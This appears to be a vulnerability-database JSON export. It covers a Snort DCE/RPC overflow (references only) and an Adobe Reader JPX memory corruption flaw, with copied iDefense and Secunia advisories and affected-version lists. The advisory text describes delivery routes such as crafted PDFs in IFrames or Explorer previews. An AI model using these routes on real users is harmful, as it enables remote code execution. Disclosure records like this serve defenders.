            "trust": 2.6
          },
          {
            "db": "SECUNIA",
            "id": "24239",
            "trust": 1.8
          },
          {
            "db": "SECUNIA",
            "id": "26746",
            "trust": 1.8
          },
          {
            "db": "SECUNIA",
            "id": "24240",
            "trust": 1.8
          },
          {
            "db": "SECTRACK",
            "id": "1017669",
            "trust": 1.8
          },
          {
            "db": "SECTRACK",
            "id": "1017670",
            "trust": 1.8
          },
          {
            "db": "EXPLOIT-DB",
            "id": "3362",
            "trust": 1.8
          },
          {
            "db": "VUPEN",
            "id": "ADV-2007-0668",
            "trust": 1.8
          },
          {
            "db": "VUPEN",
            "id": "ADV-2007-0656",
            "trust": 1.8
          },
          {
            "db": "OSVDB",
            "id": "32094",
            "trust": 1.8
          },
          {
            "db": "XF",
            "id": "31275",
            "trust": 1.4
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2007-000170",
            "trust": 0.8
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-200702-347",
            "trust": 0.7
          },
          {
            "db": "CERT/CC",
            "id": "TA07-050A",
            "trust": 0.6
          },
          {
            "db": "GENTOO",
            "id": "GLSA-200703-01",
            "trust": 0.6
          },
          {
            "db": "MILW0RM",
            "id": "3362",
            "trust": 0.6
          },
          {
            "db": "ISS",
            "id": "20070219 SOURCEFIRE SNORT REMOTE BUFFER OVERFLOW",
            "trust": 0.6
          },
          {
            "db": "BUGTRAQ",
            "id": "20070303 ERRATA: [ GLSA 200703-01 ] SNORT: REMOTE EXECUTION OF ARBITRARY CODE",
            "trust": 0.6
          },
          {
            "db": "FEDORA",
            "id": "FEDORA-2007-2060",
            "trust": 0.6
          },
          {
            "db": "EXPLOIT-DB",
            "id": "3609",
            "trust": 0.2
          },
          {
            "db": "PACKETSTORM",
            "id": "54522",
            "trust": 0.2
          },
          {
            "db": "PACKETSTORM",
            "id": "54569",
            "trust": 0.2
          },
          {
            "db": "PACKETSTORM",
            "id": "54834",
            "trust": 0.2
          },
          {
            "db": "SEEBUG",
            "id": "SSVID-72771",
            "trust": 0.1
          },
          {
            "db": "EXPLOIT-DB",
            "id": "18723",
            "trust": 0.1
          },
          {
            "db": "EXPLOIT-DB",
            "id": "3391",
            "trust": 0.1
          },
          {
            "db": "PACKETSTORM",
            "id": "111677",
            "trust": 0.1
          },
          {
            "db": "PACKETSTORM",
            "id": "54632",
            "trust": 0.1
          },
          {
            "db": "VULHUB",
            "id": "VHN-21384",
            "trust": 0.1
          },
          {
            "db": "VULMON",
            "id": "CVE-2006-5276",
            "trust": 0.1
          }
        ],
        "sources": [
          {
            "db": "CERT/CC",
            "id": "VU#196240"
          },
          {
            "db": "VULHUB",
            "id": "VHN-21384"
          },
          {
            "db": "VULMON",
            "id": "CVE-2006-5276"
          },
          {
            "db": "BID",
            "id": "22616"
          },
          {
            "db": "PACKETSTORM",
            "id": "54569"
          },
          {
            "db": "PACKETSTORM",
            "id": "54522"
          },
          {
            "db": "PACKETSTORM",
            "id": "54834"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-200702-347"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2007-000170"
          },
          {
            "db": "NVD",
            "id": "CVE-2006-5276"
          }
        ]
      },
      "id": "VAR-200702-0378",
      "iot": {
        "_id": null,
        "data": true,
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-21384"
          }
        ],
        "trust": 0.01
      },
      "last_update_date": "2026-04-10T23:50:14.187000Z",
      "patch": {
        "_id": null,
        "data": [
          {
            "title": "Latest changelog : 2.6.1.3",
            "trust": 0.8,
            "url": "http://www.snort.org/dl/"
          },
          {
            "title": "2007-02-19 Sourcefire Advisory: Vulnerability in Snort DCE/RPC Preprocessor",
            "trust": 0.8,
            "url": "http://www.snort.org/docs/advisory-2007-02-19.html"
          },
          {
            "title": "Sourcefire Support Login",
            "trust": 0.8,
            "url": "https://support.sourcefire.com/"
          },
          {
            "title": "Top Page",
            "trust": 0.8,
            "url": "http://www.sourcefire.com/"
          },
          {
            "title": "Detection for Vulnerability in Snort DCE/RPC Pre-processor",
            "trust": 0.8,
            "url": "http://www.sourcefire.com/services/advisories/sa022007.html"
          },
          {
            "title": "vrt-rules-2007-02-20",
            "trust": 0.8,
            "url": "http://www.snort.org/vrt/advisories/vrt-rules-2007-02-20.html"
          },
          {
            "title": "LinuxFlaw",
            "trust": 0.1,
            "url": "https://github.com/mudongliang/LinuxFlaw "
          }
        ],
        "sources": [
          {
            "db": "VULMON",
            "id": "CVE-2006-5276"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2007-000170"
          }
        ]
      },
      "problemtype_data": {
        "_id": null,
        "data": [
          {
            "problemtype": "NVD-CWE-Other",
            "trust": 1.0
          }
        ],
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2006-5276"
          }
        ]
      },
      "references": {
        "_id": null,
        "data": [
          {
            "trust": 3.0,
            "url": "http://www.kb.cert.org/vuls/id/196240"
          },
          {
            "trust": 2.9,
            "url": "http://www.snort.org/docs/advisory-2007-02-19.html"
          },
          {
            "trust": 2.6,
            "url": "http://iss.net/threats/257.html"
          },
          {
            "trust": 2.6,
            "url": "http://www.securityfocus.com/bid/22616"
          },
          {
            "trust": 2.6,
            "url": "http://www.us-cert.gov/cas/techalerts/ta07-050a.html"
          },
          {
            "trust": 1.9,
            "url": "http://security.gentoo.org/glsa/glsa-200703-01.xml"
          },
          {
            "trust": 1.8,
            "url": "http://www116.nortelnetworks.com/pub/repository/clarify/document/2007/08/021923-01.pdf"
          },
          {
            "trust": 1.8,
            "url": "http://fedoranews.org/updates/fedora-2007-206.shtml"
          },
          {
            "trust": 1.8,
            "url": "https://bugzilla.redhat.com/show_bug.cgi?id=229265"
          },
          {
            "trust": 1.8,
            "url": "http://www.osvdb.org/32094"
          },
          {
            "trust": 1.8,
            "url": "http://www.securitytracker.com/id?1017669"
          },
          {
            "trust": 1.8,
            "url": "http://www.securitytracker.com/id?1017670"
          },
          {
            "trust": 1.8,
            "url": "http://secunia.com/advisories/24190"
          },
          {
            "trust": 1.8,
            "url": "http://secunia.com/advisories/24235"
          },
          {
            "trust": 1.8,
            "url": "http://secunia.com/advisories/24239"
          },
          {
            "trust": 1.8,
            "url": "http://secunia.com/advisories/24240"
          },
          {
            "trust": 1.8,
            "url": "http://secunia.com/advisories/24272"
          },
          {
            "trust": 1.8,
            "url": "http://secunia.com/advisories/26746"
          },
          {
            "trust": 1.7,
            "url": "http://www130.nortelnetworks.com/go/main.jsp?cscat=bltndetail\u0026documentoid=540173"
          },
          {
            "trust": 1.4,
            "url": "http://xforce.iss.net/xforce/xfdb/31275"
          },
          {
            "trust": 1.2,
            "url": "http://www.securityfocus.com/archive/1/461810/100/0/threaded"
          },
          {
            "trust": 1.2,
            "url": "https://www.exploit-db.com/exploits/3362"
          },
          {
            "trust": 1.2,
            "url": "http://www.vupen.com/english/advisories/2007/0656"
          },
          {
            "trust": 1.2,
            "url": "http://www.vupen.com/english/advisories/2007/0668"
          },
          {
            "trust": 1.2,
            "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/31275"
          },
          {
            "trust": 0.9,
            "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2006-5276"
          },
          {
            "trust": 0.8,
            "url": "https://support.sourcefire.com/"
          },
          {
            "trust": 0.8,
            "url": "http://www.snort.org/docs/snort_htmanuals/htmanual_261/node104.html"
          },
          {
            "trust": 0.8,
            "url": "http://www.snort.org/docs/release_notes/release_notes_2613.txt"
          },
          {
            "trust": 0.8,
            "url": "http://www.snort.org/dl/"
          },
          {
            "trust": 0.8,
            "url": "http://secunia.com/advisories/24235/"
          },
          {
            "trust": 0.8,
            "url": "http://secunia.com/advisories/24190/"
          },
          {
            "trust": 0.8,
            "url": "http://secunia.com/advisories/24272/"
          },
          {
            "trust": 0.8,
            "url": "http://jvn.jp/cert/jvnta07-050a/index.html"
          },
          {
            "trust": 0.8,
            "url": "http://jvn.jp/tr/trta07-050a/index.html"
          },
          {
            "trust": 0.8,
            "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2006-5276"
          },
          {
            "trust": 0.6,
            "url": "http://www.securityfocus.com/archive/1/archive/1/461810/100/0/threaded"
          },
          {
            "trust": 0.6,
            "url": "http://www.milw0rm.com/exploits/3362"
          },
          {
            "trust": 0.6,
            "url": "http://www.frsirt.com/english/advisories/2007/0668"
          },
          {
            "trust": 0.6,
            "url": "http://www.frsirt.com/english/advisories/2007/0656"
          },
          {
            "trust": 0.3,
            "url": "https://www.it-isac.org/postings/cyber/alertdetail.php?id=4108\u0026menutype=menupublic"
          },
          {
            "trust": 0.3,
            "url": "http://www.snort.org/"
          },
          {
            "trust": 0.3,
            "url": "http://www130.nortelnetworks.com/go/main.jsp?cscat=bltndetail\u0026documentoid=540173\u0026renditionid=\u0026poid=null"
          },
          {
            "trust": 0.3,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2006-5276"
          },
          {
            "trust": 0.1,
            "url": "http://www130.nortelnetworks.com/go/main.jsp?cscat=bltndetail\u0026amp;documentoid=540173"
          },
          {
            "trust": 0.1,
            "url": "https://cwe.mitre.org/data/definitions/.html"
          },
          {
            "trust": 0.1,
            "url": "https://www.rapid7.com/db/vulnerabilities/gentoo-linux-cve-2006-5276"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov"
          },
          {
            "trust": 0.1,
            "url": "https://www.rapid7.com/db/modules/exploit/multi/ids/snort_dce_rpc"
          },
          {
            "trust": 0.1,
            "url": "https://www.exploit-db.com/exploits/3609/"
          },
          {
            "trust": 0.1,
            "url": "http://www.snort.org/docs/snort_htmanuals/htmanual_261/node104.html\u003e"
          },
          {
            "trust": 0.1,
            "url": "http://www.us-cert.gov/cas/techalerts/ta07-050a.html\u003e"
          },
          {
            "trust": 0.1,
            "url": "http://iss.net/threats/257.html\u003e"
          },
          {
            "trust": 0.1,
            "url": "http://www.us-cert.gov/cas/signup.html\u003e."
          },
          {
            "trust": 0.1,
            "url": "https://support.sourcefire.com/\u003e"
          },
          {
            "trust": 0.1,
            "url": "http://www.kb.cert.org/vuls/id/196240\u003e"
          },
          {
            "trust": 0.1,
            "url": "http://www.snort.org/dl/\u003e"
          },
          {
            "trust": 0.1,
            "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2006-5276\u003e"
          },
          {
            "trust": 0.1,
            "url": "http://www.us-cert.gov/legal.html\u003e"
          },
          {
            "trust": 0.1,
            "url": "http://www.snort.org/docs/advisory-2007-02-19.html\u003e"
          },
          {
            "trust": 0.1,
            "url": "http://www.snort.org/docs/release_notes/release_notes_2613.txt\u003e"
          },
          {
            "trust": 0.1,
            "url": "http://www.techsay.com/default.php?page=join.php\u0026p=sourceforge\u0026cid=devdev"
          },
          {
            "trust": 0.1,
            "url": "https://lists.sourceforge.net/lists/listinfo/snort-announce"
          },
          {
            "trust": 0.1,
            "url": "http://bugs.gentoo.org."
          },
          {
            "trust": 0.1,
            "url": "http://creativecommons.org/licenses/by-sa/2.5"
          },
          {
            "trust": 0.1,
            "url": "http://security.gentoo.org/"
          }
        ],
        "sources": [
          {
            "db": "CERT/CC",
            "id": "VU#196240"
          },
          {
            "db": "VULHUB",
            "id": "VHN-21384"
          },
          {
            "db": "VULMON",
            "id": "CVE-2006-5276"
          },
          {
            "db": "BID",
            "id": "22616"
          },
          {
            "db": "PACKETSTORM",
            "id": "54569"
          },
          {
            "db": "PACKETSTORM",
            "id": "54522"
          },
          {
            "db": "PACKETSTORM",
            "id": "54834"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-200702-347"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2007-000170"
          },
          {
            "db": "NVD",
            "id": "CVE-2006-5276"
          }
        ]
      },
      "sources": {
        "_id": null,
        "data": [
          {
            "db": "CERT/CC",
            "id": "VU#196240",
            "ident": null
          },
          {
            "db": "VULHUB",
            "id": "VHN-21384",
            "ident": null
          },
          {
            "db": "VULMON",
            "id": "CVE-2006-5276",
            "ident": null
          },
          {
            "db": "BID",
            "id": "22616",
            "ident": null
          },
          {
            "db": "PACKETSTORM",
            "id": "54569",
            "ident": null
          },
          {
            "db": "PACKETSTORM",
            "id": "54522",
            "ident": null
          },
          {
            "db": "PACKETSTORM",
            "id": "54834",
            "ident": null
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-200702-347",
            "ident": null
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2007-000170",
            "ident": null
          },
          {
            "db": "NVD",
            "id": "CVE-2006-5276",
            "ident": null
          }
        ]
      },
      "sources_release_date": {
        "_id": null,
        "data": [
          {
            "date": "2007-02-19T00:00:00",
            "db": "CERT/CC",
            "id": "VU#196240",
            "ident": null
          },
          {
            "date": "2007-02-20T00:00:00",
            "db": "VULHUB",
            "id": "VHN-21384",
            "ident": null
          },
          {
            "date": "2007-02-20T00:00:00",
            "db": "VULMON",
            "id": "CVE-2006-5276",
            "ident": null
          },
          {
            "date": "2007-02-19T00:00:00",
            "db": "BID",
            "id": "22616",
            "ident": null
          },
          {
            "date": "2007-02-23T03:05:45",
            "db": "PACKETSTORM",
            "id": "54569",
            "ident": null
          },
          {
            "date": "2007-02-20T01:23:04",
            "db": "PACKETSTORM",
            "id": "54522",
            "ident": null
          },
          {
            "date": "2007-03-06T06:25:25",
            "db": "PACKETSTORM",
            "id": "54834",
            "ident": null
          },
          {
            "date": "2007-02-19T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-200702-347",
            "ident": null
          },
          {
            "date": "2007-04-01T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2007-000170",
            "ident": null
          },
          {
            "date": "2007-02-20T01:28:00",
            "db": "NVD",
            "id": "CVE-2006-5276",
            "ident": null
          }
        ]
      },
      "sources_update_date": {
        "_id": null,
        "data": [
          {
            "date": "2008-01-30T00:00:00",
            "db": "CERT/CC",
            "id": "VU#196240",
            "ident": null
          },
          {
            "date": "2018-10-17T00:00:00",
            "db": "VULHUB",
            "id": "VHN-21384",
            "ident": null
          },
          {
            "date": "2018-10-17T00:00:00",
            "db": "VULMON",
            "id": "CVE-2006-5276",
            "ident": null
          },
          {
            "date": "2007-11-15T00:38:00",
            "db": "BID",
            "id": "22616",
            "ident": null
          },
          {
            "date": "2007-05-16T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-200702-347",
            "ident": null
          },
          {
            "date": "2007-04-01T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2007-000170",
            "ident": null
          },
          {
            "date": "2025-04-09T00:30:58.490000",
            "db": "NVD",
            "id": "CVE-2006-5276",
            "ident": null
          }
        ]
      },
      "threat_type": {
        "_id": null,
        "data": "remote",
        "sources": [
          {
            "db": "PACKETSTORM",
            "id": "54569"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-200702-347"
          }
        ],
        "trust": 0.7
      },
      "title": {
        "_id": null,
        "data": "Sourcefire Snort DCE/RPC preprocessor does not properly reassemble fragmented packets",
        "sources": [
          {
            "db": "CERT/CC",
            "id": "VU#196240"
          }
        ],
        "trust": 0.8
      },
      "type": {
        "_id": null,
        "data": "buffer overflow",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-200702-347"
          }
        ],
        "trust": 0.6
      }
    }

    VAR-200912-0751

    Vulnerability from variot - Updated: 2026-04-10 23:16

    Adobe Reader and Acrobat 9.x before 9.3, and 8.x before 8.2 on Windows and Mac OS X, allows remote attackers to execute arbitrary code via a crafted JPC_MS_RGN marker in the Jp2c stream of a JpxDecode encoded data stream, which triggers an integer sign extension that bypasses a sanity check, leading to memory corruption. The Doc.media.newPlayer method in Adobe Acrobat and Reader contains a use-after-free vulnerability, which may allow a remote, unauthenticated attacker to execute arbitrary code on a vulnerable system. Adobe Reader and Acrobat are prone to a memory-corruption vulnerability. An attacker can exploit this issue to execute arbitrary code. Failed exploit attempts will likely cause denial-of-service conditions. This issue affects Reader and Acrobat 9.2 and prior versions. NOTE: This issue was previously covered in BID 37667 (Adobe Acrobat and Reader January 2010 Multiple Remote Vulnerabilities), but has been given its own record to better document it. iDefense Security Advisory 01.12.10 http://labs.idefense.com/intelligence/vulnerabilities/ Jan 12, 2010

    I. For more information, please visit following pages:

    http://www.adobe.com/products/reader/ http://www.adobe.com/products/acrobat/

    II.

    The vulnerability occurs when processing the Jp2c stream of a JpxDecode encoded data stream within a PDF file. During the processing of a JPC_MS_RGN marker, an integer sign extension may cause a bounds check to be bypassed. This results in an exploitable memory corruption vulnerability.

    III. The attacker will have to create a malicious PDF file and convince the victim to open it. This can be accomplished by embedding the PDF file into an IFrame inside of a Web page, which will result in automatic exploitation once the page is viewed. The file could also be e-mailed as an attachment or placed on a file share. In these cases, a user would have to manually open the file to trigger exploitation. If preview is enabled in Windows Explorer, Acrobat will try to generate a preview for PDF files when a folder containing PDF files is accessed, thus triggering the exploitation.

    IV. DETECTION

    iDefense has confirmed the existence of this vulnerability in latest version of Adobe Reader, at the time of testing, version 9.1.0. Previous versions may also be affected.

    Adobe has stated that all 9.2 and below versions, as well as all 8.1.7 and below versions are vulnerable.

    V. WORKAROUND

    None of the following workarounds will prevent exploitation, but they can reduce potential attack vectors and make exploitation more difficult.

    Prevent PDF documents from being opened automatically by the Web browser Disable JavaScript Disable PDFShell extension by removing or renaming the Acrord32info.exe file

    VI. VENDOR RESPONSE

    Adobe has released a patch which addresses this issue. Information about downloadable vendor updates can be found by clicking on the URLs shown.

    http://www.adobe.com/support/security/bulletins/apsb10-02.html

    VII. CVE INFORMATION

    The Common Vulnerabilities and Exposures (CVE) project has assigned the name CVE-2009-3955 to this issue. This is a candidate for inclusion in the CVE list (http://cve.mitre.org/), which standardizes names for security problems.

    VIII. DISCLOSURE TIMELINE

    08/06/2009 Initial Contact 08/06/2009 Initial Response 09/16/2009 Vendor requested POC. iDefense sent POC. 09/17/2009 Vendor response. 01/12/2010 Coordinated public disclosure.

    IX. CREDIT

    This vulnerability was reported to iDefense by Code Audit Labs http://www.vulnhunt.com.

    Get paid for vulnerability research http://labs.idefense.com/methodology/vulnerability/vcp.php

    Free tools, research and upcoming events http://labs.idefense.com/

    X. LEGAL NOTICES

    Copyright \xa9 2010 iDefense, Inc.

    Permission is granted for the redistribution of this alert electronically. It may not be edited in any way without the express written consent of iDefense. If you wish to reprint the whole or any part of this alert in any other medium other than electronically, please e-mail customerservice@idefense.com for permission.

    Disclaimer: The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information. ----------------------------------------------------------------------

    Do you have VARM strategy implemented?

    (Vulnerability Assessment Remediation Management)

    If not, then implement it through the most reliable vulnerability intelligence source on the market.

    Implement it through Secunia.

    For more information visit: http://secunia.com/advisories/business_solutions/

    Alternatively request a call from a Secunia representative today to discuss how we can help you with our capabilities contact us at: sales@secunia.com


    TITLE: Adobe Reader/Acrobat Code Execution Vulnerability

    SECUNIA ADVISORY ID: SA37690

    VERIFY ADVISORY: http://secunia.com/advisories/37690/

    DESCRIPTION: A vulnerability has been reported in Adobe Reader and Acrobat, which can be exploited by malicious people to compromise a user's system.

    NOTE: This vulnerability is currently being actively exploited.

    SOLUTION: Do not open untrusted PDF files.

    Do not visit untrusted websites or follow untrusted links.

    PROVIDED AND/OR DISCOVERED BY: Reported as a 0-day.

    ORIGINAL ADVISORY: http://blogs.adobe.com/psirt/2009/12/new_adobe_reader_and_acrobat_v.html


    About: This Advisory was delivered by Secunia as a free service to help everybody keeping their systems up to date against the latest vulnerabilities.

    Subscribe: http://secunia.com/advisories/secunia_security_advisories/

    Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/

    Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor

    Show details on source website

    {
      "affected_products": {
        "_id": null,
        "data": [
          {
            "_id": null,
            "model": "acrobat reader",
            "scope": "eq",
            "trust": 1.6,
            "vendor": "adobe",
            "version": "4.0.5c"
          },
          {
            "_id": null,
            "model": "acrobat reader",
            "scope": "eq",
            "trust": 1.6,
            "vendor": "adobe",
            "version": "4.0.5a"
          },
          {
            "_id": null,
            "model": "acrobat reader",
            "scope": "eq",
            "trust": 1.6,
            "vendor": "adobe",
            "version": "5.0.10"
          },
          {
            "_id": null,
            "model": "acrobat reader",
            "scope": "eq",
            "trust": 1.6,
            "vendor": "adobe",
            "version": "4.0"
          },
          {
            "_id": null,
            "model": "acrobat reader",
            "scope": "eq",
            "trust": 1.6,
            "vendor": "adobe",
            "version": "3.0"
          },
          {
            "_id": null,
            "model": "acrobat reader",
            "scope": "eq",
            "trust": 1.6,
            "vendor": "adobe",
            "version": "5.0"
          },
          {
            "_id": null,
            "model": "acrobat reader",
            "scope": "eq",
            "trust": 1.6,
            "vendor": "adobe",
            "version": "3.02"
          },
          {
            "_id": null,
            "model": "acrobat reader",
            "scope": "eq",
            "trust": 1.6,
            "vendor": "adobe",
            "version": "4.0.5"
          },
          {
            "_id": null,
            "model": "acrobat reader",
            "scope": "eq",
            "trust": 1.6,
            "vendor": "adobe",
            "version": "4.5"
          },
          {
            "_id": null,
            "model": "acrobat reader",
            "scope": "eq",
            "trust": 1.6,
            "vendor": "adobe",
            "version": "3.01"
          },
          {
            "_id": null,
            "model": "acrobat",
            "scope": "eq",
            "trust": 1.3,
            "vendor": "adobe",
            "version": "9.1.1"
          },
          {
            "_id": null,
            "model": "acrobat",
            "scope": "eq",
            "trust": 1.3,
            "vendor": "adobe",
            "version": "7.0.9"
          },
          {
            "_id": null,
            "model": "acrobat",
            "scope": "eq",
            "trust": 1.3,
            "vendor": "adobe",
            "version": "6.0.1"
          },
          {
            "_id": null,
            "model": "acrobat reader",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "adobe",
            "version": "7.0.8"
          },
          {
            "_id": null,
            "model": "acrobat reader",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "adobe",
            "version": "8.1"
          },
          {
            "_id": null,
            "model": "acrobat reader",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "adobe",
            "version": "9.1.1"
          },
          {
            "_id": null,
            "model": "acrobat reader",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "adobe",
            "version": "9.1.2"
          },
          {
            "_id": null,
            "model": "acrobat",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "adobe",
            "version": "7.1.2"
          },
          {
            "_id": null,
            "model": "acrobat reader",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "adobe",
            "version": "9.1"
          },
          {
            "_id": null,
            "model": "acrobat",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "adobe",
            "version": "5.0.6"
          },
          {
            "_id": null,
            "model": "acrobat",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "adobe",
            "version": "8.1.1"
          },
          {
            "_id": null,
            "model": "acrobat reader",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "adobe",
            "version": "5.0.5"
          },
          {
            "_id": null,
            "model": "acrobat reader",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "adobe",
            "version": "8.1.6"
          },
          {
            "_id": null,
            "model": "acrobat",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "adobe",
            "version": "3.0"
          },
          {
            "_id": null,
            "model": "acrobat",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "adobe",
            "version": "7.0.4"
          },
          {
            "_id": null,
            "model": "acrobat",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "adobe",
            "version": "7.1.1"
          },
          {
            "_id": null,
            "model": "acrobat reader",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "adobe",
            "version": "9.0"
          },
          {
            "_id": null,
            "model": "acrobat reader",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "adobe",
            "version": "8.1.5"
          },
          {
            "_id": null,
            "model": "acrobat",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "adobe",
            "version": "4.0.5a"
          },
          {
            "_id": null,
            "model": "acrobat",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "adobe",
            "version": "4.0"
          },
          {
            "_id": null,
            "model": "acrobat reader",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "adobe",
            "version": "6.0.2"
          },
          {
            "_id": null,
            "model": "acrobat reader",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "adobe",
            "version": "9.1.3"
          },
          {
            "_id": null,
            "model": "acrobat",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "adobe",
            "version": "7.0.8"
          },
          {
            "_id": null,
            "model": "acrobat reader",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "adobe",
            "version": "7.1.0"
          },
          {
            "_id": null,
            "model": "acrobat reader",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "adobe",
            "version": "5.0.11"
          },
          {
            "_id": null,
            "model": "acrobat reader",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "adobe",
            "version": "5.0.6"
          },
          {
            "_id": null,
            "model": "acrobat",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "adobe",
            "version": "8.1"
          },
          {
            "_id": null,
            "model": "acrobat reader",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "adobe",
            "version": "6.0.5"
          },
          {
            "_id": null,
            "model": "acrobat",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "adobe",
            "version": "6.0.6"
          },
          {
            "_id": null,
            "model": "acrobat",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "adobe",
            "version": "9.1.2"
          },
          {
            "_id": null,
            "model": "acrobat reader",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "adobe",
            "version": "7.0.1"
          },
          {
            "_id": null,
            "model": "acrobat reader",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "adobe",
            "version": "8.1.4"
          },
          {
            "_id": null,
            "model": "acrobat",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "adobe",
            "version": "5.0.5"
          },
          {
            "_id": null,
            "model": "acrobat reader",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "adobe",
            "version": "6.0"
          },
          {
            "_id": null,
            "model": "acrobat reader",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "adobe",
            "version": "7.0.7"
          },
          {
            "_id": null,
            "model": "acrobat",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "adobe",
            "version": "8.1.6"
          },
          {
            "_id": null,
            "model": "acrobat reader",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "adobe",
            "version": "6.0.3"
          },
          {
            "_id": null,
            "model": "acrobat reader",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "adobe",
            "version": "9.2"
          },
          {
            "_id": null,
            "model": "acrobat reader",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "adobe",
            "version": "6.0.4"
          },
          {
            "_id": null,
            "model": "acrobat",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "adobe",
            "version": "9.0"
          },
          {
            "_id": null,
            "model": "acrobat",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "adobe",
            "version": "8.1.5"
          },
          {
            "_id": null,
            "model": "acrobat reader",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "adobe",
            "version": "7.0.9"
          },
          {
            "_id": null,
            "model": "acrobat",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "adobe",
            "version": "8.1.2"
          },
          {
            "_id": null,
            "model": "acrobat",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "adobe",
            "version": "6.0.2"
          },
          {
            "_id": null,
            "model": "acrobat",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "adobe",
            "version": "9.1.3"
          },
          {
            "_id": null,
            "model": "acrobat",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "adobe",
            "version": "4.0.5c"
          },
          {
            "_id": null,
            "model": "acrobat reader",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "adobe",
            "version": "7.0.2"
          },
          {
            "_id": null,
            "model": "acrobat",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "adobe",
            "version": "7.1.0"
          },
          {
            "_id": null,
            "model": "acrobat reader",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "adobe",
            "version": "7.1.3"
          },
          {
            "_id": null,
            "model": "acrobat",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "adobe",
            "version": "6.0.5"
          },
          {
            "_id": null,
            "model": "acrobat reader",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "adobe",
            "version": "6.0.1"
          },
          {
            "_id": null,
            "model": "acrobat reader",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "adobe",
            "version": "7.0.6"
          },
          {
            "_id": null,
            "model": "acrobat",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "adobe",
            "version": "7.0.1"
          },
          {
            "_id": null,
            "model": "acrobat",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "adobe",
            "version": "8.1.4"
          },
          {
            "_id": null,
            "model": "acrobat reader",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "adobe",
            "version": "7.0.5"
          },
          {
            "_id": null,
            "model": "acrobat",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "adobe",
            "version": "8.1.7"
          },
          {
            "_id": null,
            "model": "acrobat reader",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "adobe",
            "version": "5.1"
          },
          {
            "_id": null,
            "model": "acrobat",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "adobe",
            "version": "6.0"
          },
          {
            "_id": null,
            "model": "acrobat reader",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "adobe",
            "version": "7.0"
          },
          {
            "_id": null,
            "model": "acrobat",
            "scope": "eq",
            "trust": 1.0,
